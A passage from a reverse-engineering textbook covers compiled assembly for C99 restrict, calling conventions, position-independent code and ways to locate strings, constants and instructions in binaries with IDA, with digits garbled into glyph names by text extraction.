mov r14, r12
and r14, rcx
mov rax, r14
mov r8, r14
xor r8, rbx
xor rax, r15
not rbx
and rax, rdx
mov rdi, rax
xor rdi, rsi
or rdi, rcx
xor rdi, r10
and rbx, rdi
mov rcx, rdi
or rcx, r9
xor rcx, rax
mov rax, r13
xor rax, QWORD PTR x36$1$[rsp]
and rcx, QWORD PTR a1$[rsp]
or rax, r9
not rcx
xor rcx, rax
mov rax, QWORD PTR out2$[rsp]
xor rcx, QWORD PTR [rax]
xor rcx, r8
mov QWORD PTR [rax], rcx
mov rax, QWORD PTR x36$1$[rsp]
mov rcx, r14
or rax, r8
or rcx, r11
mov r11, r9
xor rcx, rdx
mov QWORD PTR x36$1$[rsp], rax
mov r8, rsi
mov rdx, rcx
xor rdx, r13
not rdx
and rdx, rdi
mov r10, rdx
and r10, r9
xor r10, rax
xor r10, rbx
not rbx
and rbx, r9
mov rax, r10
and rax, QWORD PTR a1$[rsp]
xor rbx, rax
mov rax, QWORD PTR out4$[rsp]
/one.pnum/five.pnum/two.pnum
xor rbx, QWORD PTR [rax]
xor rbx, rcx
mov QWORD PTR [rax], rbx
mov rbx, QWORD PTR x36$1$[rsp]
and rbx, rbp
mov r9, rbx
not r9
and r9, rdi
or r8, r11
mov rax, QWORD PTR out1$[rsp]
xor r8, r9
not r9
and r9, rcx
or rdx, rbp
mov rbp, QWORD PTR [rsp+80]
or r9, rsi
xor rbx, r12
mov rcx, r11
not rcx
not r14
not r13
and rcx, r9
or r9, rdi
and rbx, r14
xor r9, r15
xor rcx, rdx
mov rdx, QWORD PTR a1$[rsp]
not r9
not rcx
and r13, r10
and r9, r11
and rcx, rdx
xor r9, rbx
mov rbx, QWORD PTR [rsp+72]
not rcx
xor rcx, QWORD PTR [rax]
or r9, rdx
not r9
xor rcx, r8
mov QWORD PTR [rax], rcx
mov rax, QWORD PTR out3$[rsp]
xor r9, r13
xor r9, QWORD PTR [rax]
xor r9, r8
mov QWORD PTR [rax], r9
pop r15
pop r14
pop r13
pop r12
pop rdi
pop rsi
ret 0
s1 ENDP
Nothing allocated in local stack by compiler, x36is synonym for a5.
By the way, we can see here, the function saved RCXandRDXregisters in allocated by caller space, but R8and
R9are not saved but used from the beginning.
By the way, there are CPUs with much more general purpose registers, Itanium, for example — /one.pnum/two.pnum/eight.pnum registers.
/one.pnum./two.pnum/one.pnum./two.pnum ARM
In ARM, /six.pnum/four.pnum-bit instructions are appeared in ARMv/eight.pnum.
/one.pnum/five.pnum/three.pnum
/one.pnum./two.pnum/two.pnum C/nine.pnum/nine.pnum restrict
Here is a reason why FORTRAN programs, in some cases, works faster than C/C++ ones.
void f1 (int* x, int* y, int* sum, int* product, int* sum_product, int* update_me, size_t s)
{
for (int i=0; i<s; i++)
{
sum[i]=x[i]+y[i];
product[i]=x[i]*y[i];
update_me[i]=i*123; // some dummy value
sum_product[i]=sum[i]+product[i];
};
};
That’s very simple example with one specific thing in it: pointer to update_me array could be a pointer to sum
array,product array, or even sum_product array — because, there are nothing criminal in it, right?
Compiler is fully aware about it, so it generates a code with four stages in loop body:
∙calculate next sum[i]
∙calculate next product[i]
∙calculate next update_me[i]
∙calculate next sum_product[i] — on this stage, we need to load from memory already calculated sum[i]
andproduct[i]
Is it possible to optimize the last stage? Because already calculated sum[i] andproduct[i] are not necessary
to load from memory again, becuse we already calculated them. Yes, but compiler isn’t sure that nothing was
overwritten on /three.pnumrd stage! This is called “pointer aliasing” , a situation, when compiler can’t be sure that a memory
to which some pointer is pointing, wasn’t changed.
restrict in C/nine.pnum/nine.pnum standard [ISO/zero.pnum/seven.pnum, /six.pnum./seven.pnum./three.pnum./one.pnum] is a promise, given by programmer to compiler that function arguments
marked by this keyword will always be pointing to different memory locations and never be crossed.
If to be more precise and describe this formally, restrict shows that only this pointer will be used to access an
object, with which we are working via this pointer, and no other pointer will be used for it. It can be even said that
some object will be accessed only via one single pointer, if it’s marked as restrict .
Let’s add this keyword to each argument-pointer:
void f2 (int* restrict x, int* restrict y, int* restrict sum, int* restrict product, int* restrict
sum_product,
int* restrict update_me, size_t s)
{
for (int i=0; i<s; i++)
{
sum[i]=x[i]+y[i];
product[i]=x[i]*y[i];
update_me[i]=i*123; // some dummy value
sum_product[i]=sum[i]+product[i];
};
};
Let’s see results:
Listing /one.pnum./one.pnum/one.pnum/four.pnum: GCC x/six.pnum/four.pnum: f/one.pnum()
f1:
push r15 r14 r13 r12 rbp rdi rsi rbx
mov r13, QWORD PTR 120[rsp]
mov rbp, QWORD PTR 104[rsp]
mov r12, QWORD PTR 112[rsp]
test r13, r13
je .L1
add r13, 1
/one.pnum/five.pnum/four.pnum
xor ebx, ebx
mov edi, 1
xor r11d, r11d
jmp .L4
.L6:
mov r11, rdi
mov rdi, rax
.L4:
lea rax, 0[0+r11*4]
lea r10, [rcx+rax]
lea r14, [rdx+rax]
lea rsi, [r8+rax]
add rax, r9
mov r15d, DWORD PTR [r10]
add r15d, DWORD PTR [r14]
mov DWORD PTR [rsi], r15d ; store to sum[]
mov r10d, DWORD PTR [r10]
imul r10d, DWORD PTR [r14]
mov DWORD PTR [rax], r10d ; store to product[]
mov DWORD PTR [r12+r11*4], ebx ; store to update_me[]
add ebx, 123
mov r10d, DWORD PTR [rsi] ; reload sum[i]
add r10d, DWORD PTR [rax] ; reload product[i]
lea rax, 1[rdi]
cmp rax, r13
mov DWORD PTR 0[rbp+r11*4], r10d ; store to sum_product[]
jne .L6
.L1:
pop rbx rsi rdi rbp r12 r13 r14 r15
ret
Listing /one.pnum./one.pnum/one.pnum/five.pnum: GCC x/six.pnum/four.pnum: f/two.pnum()
f2:
push r13 r12 rbp rdi rsi rbx
mov r13, QWORD PTR 104[rsp]
mov rbp, QWORD PTR 88[rsp]
mov r12, QWORD PTR 96[rsp]
test r13, r13
je .L7
add r13, 1
xor r10d, r10d
mov edi, 1
xor eax, eax
jmp .L10
.L11:
mov rax, rdi
mov rdi, r11
.L10:
mov esi, DWORD PTR [rcx+rax*4]
mov r11d, DWORD PTR [rdx+rax*4]
mov DWORD PTR [r12+rax*4], r10d ; store to update_me[]
add r10d, 123
lea ebx, [rsi+r11]
imul r11d, esi
mov DWORD PTR [r8+rax*4], ebx ; store to sum[]
mov DWORD PTR [r9+rax*4], r11d ; store to product[]
add r11d, ebx
mov DWORD PTR 0[rbp+rax*4], r11d ; store to sum_product[]
lea r11, 1[rdi]
cmp r11, r13
jne .L11
.L7:
pop rbx rsi rdi rbp r12 r13
ret
/one.pnum/five.pnum/five.pnum
The difference between compiled f1() andf2() function as follows: in f1() ,sum[i] andproduct[i] are
reloaded in the middle of loop, and in f2() there are no such thing, already calculated values are used, because
we “promised” to compiler, that no one and nothing will change values in sum[i] andproduct[i] while execution
of loop body, so it is “sure” that value from memory may not be again. Obviously, second example will work faster.
But what if pointers in function arguments will be crossed somehow? This will be on programmer’s conscience,
but results will be incorrect.
Let’s back to FORTRAN. Compilers from this programming language treats all pointers as such, so when there
are was not possible to set restrict , FORTRAN in these cases may generate faster code.
How practical is it? In the cases when function works with several big blocks in memory. There are a lot of
such in linear algebra, for example. A lot of linear algebra used on supercomputers/HPC, probably, that’s why,
traditionally, FORTRAN is still used there [Loh/one.pnum/zero.pnum].
But when there are not a big number of iterations, certainly, speed boost will not be significant.
/one.pnum/five.pnum/six.pnum
Chapter /two.pnum
Couple things to add
/one.pnum/five.pnum/seven.pnum
/two.pnum./one.pnum LEA instruction
LEA(Load Effective Address ) is instruction intended not for values summing but for address forming, e.g., for form-
ing address of array element by adding array address, element index, with multiplication of element size/one.pnum.
Important property of LEAinstruction is that it do not alter processor flags.
int f(int a, int b)
{
return a*8+b;
};
MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /Oxoption:
_a$ = 8 ; size = 4
_b$ = 12 ; size = 4
_f PROC
mov eax, DWORD PTR _b$[esp-4]
mov ecx, DWORD PTR _a$[esp-4]
lea eax, DWORD PTR [eax+ecx*8]
ret 0
_f ENDP
/one.pnumSee also: http://en.wikipedia.org/wiki/Addressing_mode
/one.pnum/five.pnum/eight.pnum
/two.pnum./two.pnum Function prologue and epilogue
Function prologue is instructions at function start. It is o/f_ten something like the following code fragment:
push ebp
mov ebp, esp
sub esp, X
What these instruction do: save EBPregister value, set EBPtoESPand then allocate space in stack for local
variables.
EBPvalue is fixed over a period of function execution and it will be used for local variables and arguments
access. One can use ESP, but it changing over time and it is not handy.
Function epilogue annuled allocated space in stack, returning EBPvalue to initial state and returning control
flow to callee:
mov esp, ebp
pop ebp
ret 0
Epilogue and prologue can make recursion performance worse.
For example, once upon a time I wrote a function to seek right node in binary tree. As a recursive function it
would look stylish but because some time was spent at each function call for prologue/epilogue, it was working
couple of times slower than the implementation without recursion.
By the way, that is the reason of tail call/two.pnumexistence: when compiler (or interpreter) transforms recursion (with
which it’s possible: tail recursion ) into iteration for efficiency.
/two.pnumhttp://en.wikipedia.org/wiki/Tail_call
/one.pnum/five.pnum/nine.pnum
/two.pnum./three.pnum npad
It’s an assembly language macro for label aligning by some specific border.
That’s o/f_ten need for the busy labels to where control flow is o/f_ten passed, e.g., loop body begin. So the CPU
will effectively load data or code from the memory, through memory bus, cache lines, etc.
Taken from listing.inc (MSVC):
By the way, it’s curious example of different NOPvariations. All these instructions has no effects whatsoever,
but has different size.
;; LISTING.INC
;;
;; This file contains assembler macros and is included by the files created
;; with the -FA compiler switch to be assembled by MASM (Microsoft Macro
;; Assembler).
;;
;; Copyright (c) 1993-2003, Microsoft Corporation. All rights reserved.
;; non destructive nops
npad macro size
if size eq 1
nop
else
if size eq 2
mov edi, edi
else
if size eq 3
; lea ecx, [ecx+00]
DB 8DH, 49H, 00H
else
if size eq 4
; lea esp, [esp+00]
DB 8DH, 64H, 24H, 00H
else
if size eq 5
add eax, DWORD PTR 0
else
if size eq 6
; lea ebx, [ebx+00000000]
DB 8DH, 9BH, 00H, 00H, 00H, 00H
else
if size eq 7
; lea esp, [esp+00000000]
DB 8DH, 0A4H, 24H, 00H, 00H, 00H, 00H
else
if size eq 8
; jmp .+8; .npad 6
DB 0EBH, 06H, 8DH, 9BH, 00H, 00H, 00H, 00H
else
if size eq 9
; jmp .+9; .npad 7
DB 0EBH, 07H, 8DH, 0A4H, 24H, 00H, 00H, 00H, 00H
else
if size eq 10
; jmp .+A; .npad 7; .npad 1
DB 0EBH, 08H, 8DH, 0A4H, 24H, 00H, 00H, 00H, 00H, 90H
else
if size eq 11
; jmp .+B; .npad 7; .npad 2
DB 0EBH, 09H, 8DH, 0A4H, 24H, 00H, 00H, 00H, 00H, 8BH, 0FFH
else
if size eq 12
; jmp .+C; .npad 7; .npad 3
DB 0EBH, 0AH, 8DH, 0A4H, 24H, 00H, 00H, 00H, 00H, 8DH, 49H, 00H
else
if size eq 13
/one.pnum/six.pnum/zero.pnum
; jmp .+D; .npad 7; .npad 4
DB 0EBH, 0BH, 8DH, 0A4H, 24H, 00H, 00H, 00H, 00H, 8DH, 64H, 24H, 00H
else
if size eq 14
; jmp .+E; .npad 7; .npad 5
DB 0EBH, 0CH, 8DH, 0A4H, 24H, 00H, 00H, 00H, 00H, 05H, 00H, 00H, 00H, 00H
else
if size eq 15
; jmp .+F; .npad 7; .npad 6
DB 0EBH, 0DH, 8DH, 0A4H, 24H, 00H, 00H, 00H, 00H, 8DH, 9BH, 00H, 00H, 00H, 00H
else
%out error: unsupported npad size
.err
endif
endif
endif
endif
endif
endif
endif
endif
endif
endif
endif
endif
endif
endif
endif
endm
/one.pnum/six.pnum/one.pnum
/two.pnum./four.pnum Signed number representations
There are several methods of representing signed numbers/three.pnum, but in x/eight.pnum/six.pnum architecture used “two’s complement” .
Difference between signed and unsigned numbers is that if we represent 0xFFFFFFFE and0x0000002 as
unsigned, then first number ( 4294967294 ) is bigger than second ( 2). If to represent them both as signed, first will
be−2, and it is lesser than second ( 2). That is the reason why conditional jumps /one.pnum./eight.pnum are present both for signed
(e.g.JG,JL) and unsigned ( JA,JBE) operations.
/two.pnum./four.pnum./one.pnum Integer overflow
It is worth noting that incorrect representation of number can lead integer overflow vulnerability.
For example, we have some network service, it receives network packets. In that packets there are also field
where subpacket length is coded. It is /three.pnum/two.pnum-bit value. A/f_ter network packet received, service checking that field,
and if it is larger than, for example, some MAX_PACKET_SIZE (let’s say, /one.pnum/zero.pnum kilobytes), packet ignored as incorrect.
Comparison is signed. Intruder set this value to 0xFFFFFFFF . While comparison, this number is considered
as signed−1and it’s lesser than /one.pnum/zero.pnum kilobytes. No error here. Service would like to copy that subpacket to another
place in memory and call memcpy (dst, src, 0xFFFFFFFF) function: this operation, rapidly scratching a lot of
inside of process memory.
More about it: http://www.phrack.org/issues.html?issue=60&id=10
/three.pnumhttp://en.wikipedia.org/wiki/Signed_number_representations
/one.pnum/six.pnum/two.pnum
/two.pnum./five.pnum Arguments passing methods (calling conventions)
/two.pnum./five.pnum./one.pnum cdecl
This is the most popular method for arguments passing to functions in C/C++ languages.
Caller pushing arguments to stack in reverse order: last argument, then penultimate element and finally —
first argument. Caller also should return back ESPto its initial state a/f_ter callee function exit.
Listing /two.pnum./one.pnum: cdecl
push arg3
push arg2
push arg3
call function
add esp, 12 ; return ESP
/two.pnum./five.pnum./two.pnum stdcall
Almost the same thing as cdecl , with the exception that callee set ESPto initial state executing RET x instruction
instead of RET, wherex = arguments number * sizeof(int)/four.pnum. Caller will not adjust stack pointer by add esp,
xinstruction.
Listing /two.pnum./two.pnum: stdcall
push arg3
push arg2
push arg1
call function
function:
... do something ...
ret 12
This method is ubiquitous in win/three.pnum/two.pnum standard libraries, but not in win/six.pnum/four.pnum (see below about win/six.pnum/four.pnum).
Variable arguments number functions
printf() -like functions are, probably, the only case of variable arguments functions in C/C++, but it’s easy to il-
lustrate an important difference between cdecl and stdcall with help of it. Let’s start with the idea that compiler
knows argument count of each printf() function calling. However, called printf() , which is already compiled
and located in MSVCRT.DLL (if to talk about Windows), has not any information about how much arguments were
passed, however it can determine it from format string. Thus, if printf() would be stdcall -function and restored
stack pointer to its initial state by counting number of arguments in format string, this could be dangerous situa-
tion, when one programmer’s typo may provoke sudden program crash. Thus it’s not suitable for such functions
to use stdcall ,cdecl is better.
/two.pnum./five.pnum./three.pnum fastcall
That’s general naming for a method for passing some of arguments via registers and all others — via stack. It
worked faster than cdecl /stdcall on older CPUs. It’s not a standardized way, so, various compilers may do it dif-
ferently. Of course, if you have two DLLs, one use another, and they are built by different compilers with fastcall
calling conventions, there will be a problems.
Both MSVC and GCC passing first and second argument via ECXandEDXand other arguments via stack. Caller
should restore stack pointer into initial state.
Stack pointer should be restored to initial state by callee, like in stdcall .
/four.pnumSize of inttype variable is /four.pnum in x/eight.pnum/six.pnum systems and /eight.pnum in x/six.pnum/four.pnum systems
/one.pnum/six.pnum/three.pnum
Listing /two.pnum./three.pnum: fastcall
push arg3
mov edx, arg2
mov ecx, arg1
call function
function:
.. do something ..
ret 4
GCC regparm
It’sfastcall evolution/five.pnumis some sense. With the -mregparm option it’s possible to set, how many arguments will be
passed via registers. /three.pnum at maximum. Thus, EAX,EDXandECXregisters will be used.
Of course, if number of arguments is less then /three.pnum, not all registers /three.pnum will be used.
Caller restores stack pointer to its initial state.
/two.pnum./five.pnum./four.pnum thiscall
In C++, it’s a thispointer to object passing into function-method.
In MSVC, thisis usually passed in ECXregister.
In GCC, thispointer is passed as a first function-method argument. Thus it will be seen that internally all
function-methods has extra argument for it.
/two.pnum./five.pnum./five.pnum x/eight.pnum/six.pnum-/six.pnum/four.pnum
win/six.pnum/four.pnum
The method of arguments passing in Win/six.pnum/four.pnum is somewhat resembling to fastcall . First /four.pnum arguments are passed
viaRCX,RDX,R8,R9, others — via stack. Caller also must prepare a place for /three.pnum/two.pnum bytes or /four.pnum /six.pnum/four.pnum-bit values, so then
callee can save there first /four.pnum arguments. Short functions may use argument values just from registers, but larger
may save its values for further use.
Caller also should return stack pointer into initial state.
This calling convention is also used in Windows x/eight.pnum/six.pnum-/six.pnum/four.pnum system DLLs (instead if stdcall in win/three.pnum/two.pnum).
/two.pnum./five.pnum./six.pnum Returning values of float and double type
In all conventions except of Win/six.pnum/four.pnum, values of type float ordouble returning via FPU register ST(0) .
In Win/six.pnum/four.pnum, return values of float and double types are returned in XMM0 register instead of ST(0) .
/five.pnumhttp://www.ohse.de/uwe/articles/gcc-attributes.html#func-regparm
/one.pnum/six.pnum/four.pnum
/two.pnum./six.pnum position-independent code
While analyzing Linux shared (.so) libraries, one may frequently spot such code pattern:
Listing /two.pnum./four.pnum: libc-/two.pnum./one.pnum/seven.pnum.so x/eight.pnum/six.pnum
.text:0012D5E3 __x86_get_pc_thunk_bx proc near ; CODE XREF: sub_17350+3
.text:0012D5E3 ; sub_173CC+4 ...
.text:0012D5E3 mov ebx, [esp+0]
.text:0012D5E6 retn
.text:0012D5E6 __x86_get_pc_thunk_bx endp
...
.text:000576C0 sub_576C0 proc near ; CODE XREF: tmpfile+73
...
.text:000576C0 push ebp
.text:000576C1 mov ecx, large gs:0
.text:000576C8 push edi
.text:000576C9 push esi
.text:000576CA push ebx
.text:000576CB call __x86_get_pc_thunk_bx
.text:000576D0 add ebx, 157930h
.text:000576D6 sub esp, 9Ch
...
.text:000579F0 lea eax, (a__gen_tempname - 1AF000h)[ebx] ; "__gen_tempname"
.text:000579F6 mov [esp+0ACh+var_A0], eax
.text:000579FA lea eax, (a__SysdepsPosix - 1AF000h)[ebx] ; "../sysdeps/posix/tempname.c"
.text:00057A00 mov [esp+0ACh+var_A8], eax
.text:00057A04 lea eax, (aInvalidKindIn_ - 1AF000h)[ebx] ; "! \"invalid KIND in
__gen_tempname\""
.text:00057A0A mov [esp+0ACh+var_A4], 14Ah
.text:00057A12 mov [esp+0ACh+var_AC], eax
.text:00057A15 call __assert_fail
All pointers to strings are corrected by some constant and by EBXvalue, which calculated at the beginning of
each function. This is so called position-independent code (PIC), it is intended to execute placed in any random
place of memory, that’s why it can’t contain any absolute memory addresses.
PIC was crucial in early computer systems and crucial now in embedded systems without virtual memory sup-
port (where processes are all placed in single continous memory block). It is also still used in *NIX systems for
shared libraries, because, shared libraries are shared across many processes while loaded in memory only once.
But all these processes may map the same shared library on different addresses, so that’s why shared library
should be working correctly without fixing on any absolute address.
Let’s do some simple experiment:
#include <stdio.h>
int global_variable=123;
int f1(int var)
{
int rt=global_variable+var;
printf ("returning %d\n", rt);
return rt;
};
Let’s compile it in GCC /four.pnum./seven.pnum./three.pnum and see resulting .so file in IDA /five.pnum:
gcc -fPIC -shared -O3 -o 1.so 1.c
/one.pnum/six.pnum/five.pnum
Listing /two.pnum./five.pnum: GCC /four.pnum./seven.pnum./three.pnum
.text:00000440 public __x86_get_pc_thunk_bx
.text:00000440 __x86_get_pc_thunk_bx proc near ; CODE XREF: _init_proc+4
.text:00000440 ; deregister_tm_clones+4 ...
.text:00000440 mov ebx, [esp+0]
.text:00000443 retn
.text:00000443 __x86_get_pc_thunk_bx endp
.text:00000570 public f1
.text:00000570 f1 proc near
.text:00000570
.text:00000570 var_1C = dword ptr -1Ch
.text:00000570 var_18 = dword ptr -18h
.text:00000570 var_14 = dword ptr -14h
.text:00000570 var_8 = dword ptr -8
.text:00000570 var_4 = dword ptr -4
.text:00000570 arg_0 = dword ptr 4
.text:00000570
.text:00000570 sub esp, 1Ch
.text:00000573 mov [esp+1Ch+var_8], ebx
.text:00000577 call __x86_get_pc_thunk_bx
.text:0000057C add ebx, 1A84h
.text:00000582 mov [esp+1Ch+var_4], esi
.text:00000586 mov eax, ds:(global_variable_ptr - 2000h)[ebx]
.text:0000058C mov esi, [eax]
.text:0000058E lea eax, (aReturningD - 2000h)[ebx] ; "returning %d\n"
.text:00000594 add esi, [esp+1Ch+arg_0]
.text:00000598 mov [esp+1Ch+var_18], eax
.text:0000059C mov [esp+1Ch+var_1C], 1
.text:000005A3 mov [esp+1Ch+var_14], esi
.text:000005A7 call ___printf_chk
.text:000005AC mov eax, esi
.text:000005AE mov ebx, [esp+1Ch+var_8]
.text:000005B2 mov esi, [esp+1Ch+var_4]
.text:000005B6 add esp, 1Ch
.text:000005B9 retn
.text:000005B9 f1 endp
That’s it: pointers to «returning %d\n» string and global_variable are to be corrected at each function execu-
tion. The __x/eight.pnum/six.pnum_get_pc_thunk_bx() function return address of the point a/f_ter call to itself (/zero.pnumx/five.pnum/seven.pnumC here) in EBX. That’s
the simple way to get value of program counter ( EIP) at some place. The /zero.pnumx/one.pnumA/eight.pnum/four.pnum constant is related to the differ-
ence between this function begin and so called Global Offset Table Procedure Linkage Table (GOT PLT), the section
right a/f_ter Global Offset Table (GOT), where pointer to global_variable is. IDA /five.pnum shows these offset processed, so to
understand them easily, but in fact the code is:
.text:00000577 call __x86_get_pc_thunk_bx
.text:0000057C add ebx, 1A84h
.text:00000582 mov [esp+1Ch+var_4], esi
.text:00000586 mov eax, [ebx-0Ch]
.text:0000058C mov esi, [eax]
.text:0000058E lea eax, [ebx-1A30h]
So,EBXpointing to GOT PLT section and to calculate pointer to global_variable which stored in GOT, /zero.pnumxC should
be subtracted. To calculate pointer to the «returning %d\n» string, /zero.pnumx/one.pnumA/three.pnum/zero.pnum should be subtracted.
By the way, that is the reason why AMD/six.pnum/four.pnum instruction set supports RIP/six.pnum-relative addressing, just to simplify
PIC-code.
Let’s compile the same C code in the same GCC version, but for x/six.pnum/four.pnum.
IDA /five.pnum would simplify output code but suppressing RIP-relative addressing details, so I’ll run objdump instead
to see the details:
0000000000000720 <f1>:
720: 48 8b 05 b9 08 20 00 mov rax,QWORD PTR [rip+0x2008b9] # 200fe0 <_DYNAMIC+0x1d0>
/six.pnumprogram counter in AMD/six.pnum/four.pnum
/one.pnum/six.pnum/six.pnum
727: 53 push rbx
728: 89 fb mov ebx,edi
72a: 48 8d 35 20 00 00 00 lea rsi,[rip+0x20] # 751 <_fini+0x9>
731: bf 01 00 00 00 mov edi,0x1
736: 03 18 add ebx,DWORD PTR [rax]
738: 31 c0 xor eax,eax
73a: 89 da mov edx,ebx
73c: e8 df fe ff ff call 620 <__printf_chk@plt>
741: 89 d8 mov eax,ebx
743: 5b pop rbx
744: c3 ret
/zero.pnumx/two.pnum/zero.pnum/zero.pnum/eight.pnumb/nine.pnum is the difference between address of instruction at /zero.pnumx/seven.pnum/two.pnum/zero.pnum and global_variable and /zero.pnumx/two.pnum/zero.pnum is the differ-
ence between that address of instruction at /zero.pnumx/seven.pnum/two.pnumA and «returning %d\n» string.
The PIC mechanism is not used in Windows DLLs. If Windows loader needs to load DLL to another place, it
“patches” DLL in memory (at the FIXUP places) in order to correct all addresses. This means, several Windows
processes can’t share once loaded DLL on different addresses in different process’ memory blocks — because
each loaded into memory DLL instance fixed to be work only at these addresses..
/one.pnum/six.pnum/seven.pnum
Chapter /three.pnum
Finding important/interesting stuff in the code
Minimalism it’s not a significant feature of modern so/f_tware.
But not because programmers writting a lot, but because all libraries are usually linked statically to executable
files. If all external libraries were shi/f_ted into external DLL files, the world would be different. (Another reason for
C++ — STL and other template libraries.)
Thus, it’s very important to determine origin of some function, if it’s from standard library or well-known library
(like Boost/one.pnum, libpng/two.pnum), and which one — is related to what we are trying to find in the code.
It’s just absurdly to rewrite all code to C/C++ to find what we looking for.
One of the primary reverse engineer’s task is to find quickly in the code what is needed.
IDA /five.pnum disassembler can search among text strings, byte sequences, constants. It’s even possible to export the
code into .lst or .asm text file and then use grep ,awk, etc.
When you try to understand what some code is doing, this easily could be some open-source library like libpng.
So when you see some constants or text strings looks familiar, it’s always worth to google it. And if you find the
opensource project where it’s used, then it will be enough just to compare the functions. It may solve some part
of problem.
For example, once upon a time I tried to understand how SAP /six.pnum./zero.pnum network packets compression/decompres-
sion is working. It’s a huge so/f_tware, but a detailed .PDB with debugging information is present, and that’s cosily.
I finally came to idea that one of the functions doing decompressing of network packet called CsDecomprLZC().
Immediately I tried to google its name and I quickly found that the function named as the same is used in MaxDB
(it’s open-source SAP project)/three.pnum.
http://www.google.com/search?q=CsDecomprLZC
Astoundingly, MaxDB and SAP /six.pnum./zero.pnum so/f_tware shared the same code for network packets compression/decom-
pression.
/three.pnum./one.pnum Communication with the outer world
First what to look on is which functions from operation system API and standard libraries are used.
If the program is divided into main executable file and a group of DLL-files, sometimes, these function’s names
may be helpful.
If we are interesting, what exactly may lead to MessageBox() call with specific text, first what we can try to
do: find this text in data segment, find references to it and find the points from which a control may be passed to
MessageBox() call we’re interesting in.
If we are talking about some game and we’re interesting, which events are more or less random in it, we may
try to find rand() function or its replacement (like Mersenne twister algorithm) and find a places from which this
function called and most important: how the results are used.
But if it’s not a game, but rand() is used, it’s also interesing, why. There are cases of unexpected rand() usage
in data compression algorithm (for encryption imitation): http://blog.yurichev.com/node/44 .
/one.pnumhttp://www.boost.org/
/two.pnumhttp://www.libpng.org/pub/png/libpng.html
/three.pnumMore about it in releval section /seven.pnum./two.pnum./one.pnum
/one.pnum/six.pnum/eight.pnum
/three.pnum./two.pnum String
Debugging messages are o/f_ten very helpful if present. In some sense, debugging messages are reporting about
what’s going on in program right now. O/f_ten these are printf() -like functions, which writes to log-files, and
sometimes, not writing anything but calls are still present, because this build is not debug build but release one.
If local or global variables are dumped in debugging messages, it might be helpful as well because it’s possible to
get variable names at least. For example, one of such functions in Oracle RDBMS is ksdwrt() .
Sometimes assert() macro presence is useful too: usually, this macro leave in code source file name, line
number and condition.
Meaningful text strings are o/f_ten helpful. IDA /five.pnum disassembler may show from which function and from which
point this specific string is used. Funny cases sometimes happen.
Paradoxically, but error messages may help us as well. In Oracle RDBMS, errors are reporting using group of
functions. More about it.
It’s possible to find very quickly, which functions reporting about errors and in which conditions. By the way,
it’s o/f_ten a reason why copy-protection systems has inarticulate cryptic error messages or just error numbers. No
one happy when so/f_tware cracker quickly understand why copy-protection is triggered just by error message.
/three.pnum./three.pnum Constants
Some algorithms, especially cryptographical, use distinct constants, which is easy to find in code using IDA /five.pnum.
For example, MD/five.pnum/four.pnumalgorithm initializes its own internal variables like:
var int h0 := 0x67452301
var int h1 := 0xEFCDAB89
var int h2 := 0x98BADCFE
var int h3 := 0x10325476
If you find these four constants usage in the code in a row — it’s very high probability this function is related
to MD/five.pnum.
/three.pnum./three.pnum./one.pnum Magic numbers
A lot of file formats defining a standard file header where magic number/five.pnumis used.
For example, all Win/three.pnum/two.pnum and MS-DOS executables are started with two characters “MZ”/six.pnum.
At the MIDI-file beginning “MThd” signature must be present. If we have a program that using MIDI-files for
something, very likely, it will check MIDI-files for validity by checking at least first /four.pnum bytes.
This could be done like:
(bufpointing to the beginning of loaded file into memory)
cmp [buf], 0x6468544D ; "MThd"
jnz _error_not_a_MIDI_file
...or by calling function for comparing memory blocks memcmp() or any other equivalent code up to CMPSB
instruction.
When you find such place you already may say where MIDI-file loading is beginning, also, we could see a loca-
tion of MIDI-file contents buffer and what is used from that buffer and how.
/four.pnumhttp://en.wikipedia.org/wiki/MD5
/five.pnumhttp://en.wikipedia.org/wiki/Magic_number_(programming)
/six.pnumhttp://en.wikipedia.org/wiki/DOS_MZ_executable
/one.pnum/six.pnum/nine.pnum
DHCP
This applies to network protocols as well. For example, DHCP protocol network packets contains so called magic
cookie : /zero.pnumx/six.pnum/three.pnum/five.pnum/three.pnum/eight.pnum/two.pnum/six.pnum/three.pnum. Any code generating DHCP protocol packets somewhere and somehow should embed this
constant into packet. If we find it in the code we may find where it happen and not only this. Something that
received DHCP packet should check magic cookie , comparing it with the constant.
For example, let’s take dhcpcore.dll file from Windows /seven.pnum x/six.pnum/four.pnum and search for the constant. And we found it, two
times: it seems, that constant is used in two functions eloquently named as DhcpExtractOptionsForValidation()
andDhcpExtractFullOptions() :
Listing /three.pnum./one.pnum: dhcpcore.dll (Windows /seven.pnum x/six.pnum/four.pnum)
.rdata:000007FF6483CBE8 dword_7FF6483CBE8 dd 63538263h ; DATA XREF: DhcpExtractOptionsForValidation
+79
.rdata:000007FF6483CBEC dword_7FF6483CBEC dd 63538263h ; DATA XREF: DhcpExtractFullOptions+97
And the places where these constants accessed:
Listing /three.pnum./two.pnum: dhcpcore.dll (Windows /seven.pnum x/six.pnum/four.pnum)
.text:000007FF6480875F mov eax, [rsi]
.text:000007FF64808761 cmp eax, cs:dword_7FF6483CBE8
.text:000007FF64808767 jnz loc_7FF64817179
And:
Listing /three.pnum./three.pnum: dhcpcore.dll (Windows /seven.pnum x/six.pnum/four.pnum)
.text:000007FF648082C7 mov eax, [r12]
.text:000007FF648082CB cmp eax, cs:dword_7FF6483CBEC
.text:000007FF648082D1 jnz loc_7FF648173AF
/three.pnum./four.pnum Finding the right instructions
If the program is using FPU instructions and there are very few of them in a code, one can try to check each by
debugger.
For example, we may be interesting, how Microso/f_t Excel calculating formulae entered by user. For example,
division operation.
If to load excel.exe (from Office /two.pnum/zero.pnum/one.pnum/zero.pnum) version /one.pnum/four.pnum./zero.pnum./four.pnum/seven.pnum/five.pnum/six.pnum./one.pnum/zero.pnum/zero.pnum/zero.pnum into IDA /five.pnum, then make a full listing and to find each
FDIV instructions (except ones which use constants as a second operand — obviously, it’s not suits us):
cat EXCEL.lst | grep fdiv | grep -v dbl_ > EXCEL.fdiv
...then we realizing they are just /one.pnum/four.pnum/four.pnum.
We can enter string like =(1/3) in Excel and check each instruction.
Checking each instruction in debugger or tracer /five.pnum./zero.pnum./one.pnum (one may check /four.pnum instruction at a time), it seems, we are
lucky here and sought-for instruction is just /one.pnum/four.pnumth:
.text:3011E919 DC 33 fdiv qword ptr [ebx]
PID=13944|TID=28744|(0) 0x2f64e919 (Excel.exe!BASE+0x11e919)
EAX=0x02088006 EBX=0x02088018 ECX=0x00000001 EDX=0x00000001
ESI=0x02088000 EDI=0x00544804 EBP=0x0274FA3C ESP=0x0274F9F8
EIP=0x2F64E919
